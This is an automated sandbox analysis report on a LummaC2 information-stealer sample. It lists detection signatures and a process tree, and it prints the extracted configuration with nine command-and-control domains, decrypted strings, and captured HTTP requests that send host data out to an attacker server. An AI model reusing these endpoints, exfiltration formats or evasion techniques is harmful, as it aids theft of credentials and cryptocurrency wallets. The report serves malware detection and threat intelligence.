Edit tour

Windows Analysis Report
E205fJJS1Q.exe

Overview

General Information

Sample name:	E205fJJS1Q.exe renamed because original name is a hash value
Original sample name:	5b8011576b37d84db9122786cded9f55.exe
Analysis ID:	1581406
MD5:	5b8011576b37d84db9122786cded9f55
SHA1:	19cfa391040bae58c5d623f5515e1505996fe646
SHA256:	7039e6fb048b2a7511b7095958332a7300cc42e66142b4c815f18cd02b6f1b69
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

E205fJJS1Q.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\E205fJJS1Q.exe" MD5: 5B8011576B37D84DB9122786CDED9F55)

LummaC2.exe (PID: 7504 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 607000C61FCB5A41B8D511B5ED7625D4)

Set-up.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["shapestickyr.lat", "curverpluch.lat", "wordyfindy.lat", "censeractersj.click", "manyrestro.lat", "talkynicer.lat", "tentabatte.lat", "slipperyloo.lat", "bashfulacid.lat"], "Build id": "Fppr10--Indus2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.E205fJJS1Q.exe.e10000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6d30d2:$s1: Runner 0x6d3237:$s3: RunOnStartup 0x6d30e6:$a1: Antis 0x6d3113:$a2: antiVM 0x6d311a:$a3: antiSandbox 0x6d3126:$a4: antiDebug 0x6d3130:$a5: antiEmulator 0x6d313d:$a6: enablePersistence 0x6d314f:$a7: enableFakeError 0x6d3260:$a8: DetectVirtualMachine 0x6d3285:$a9: DetectSandboxie 0x6d32b0:$a10: DetectDebugger 0x6d32bf:$a11: CheckEmulator

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: E205fJJS1Q.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "curverpluch.lat", "wordyfindy.lat", "censeractersj.click", "manyrestro.lat", "talkynicer.lat", "tentabatte.lat", "slipperyloo.lat", "bashfulacid.lat"], "Build id": "Fppr10--Indus2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: E205fJJS1Q.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: E205fJJS1Q.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: censeractersj.click
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.2914465457.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Fppr10--Indus2

Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d18fa157-a

Source: E205fJJS1Q.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_00F1C59C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	1_2_00F1EEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	1_2_00F1EEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push esi	1_2_00F010F3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	1_2_00F1E8D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_00F090B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	1_2_00F090B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_00F0C894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_00EF8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00F0B078
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	1_2_00F1F040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	1_2_00F1F040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	1_2_00F1B813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	1_2_00F1A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	1_2_00F1A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	1_2_00F1A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_00F1A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_00F0C9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_00F0C9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	1_2_00F059B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_00EFD189
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_00F0C984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then call dword ptr [00F21DB0h]	1_2_00EED196
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_00EFD172
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	1_2_00F1D140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_00EF92C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	1_2_00F1DAA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	1_2_00F08290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_00EF4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov eax, ecx	1_2_00EF4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	1_2_00EF4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	1_2_00EF4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	1_2_00EF4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	1_2_00F06230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then and esi, 80000000h	1_2_00EE8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, edx	1_2_00EF720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	1_2_00EF720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	1_2_00F1DBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	1_2_00EED35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	1_2_00EFCC60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	1_2_00F1B46A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_00EE7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	1_2_00EE7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	1_2_00F1BC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_00F1BC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00F09DA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, ecx	1_2_00EEEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_00EEEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_00EFAD81
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, ecx	1_2_00EFD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, eax	1_2_00EF6D52
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	1_2_00F17D00
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	1_2_00F026D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	1_2_00EF46C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [ecx], al	1_2_00F066C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	1_2_00F08640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_00F1BCDB
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	1_2_00F17790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push dword ptr [esp+04h]	1_2_00F17790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_00F0BF45

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: censeractersj.click
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 531547Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 37 30 36 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View	IP Address: 3.218.7.103 3.218.7.103

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top

Source: unknown

HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 531547Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 37 30 36 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 14:08:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try 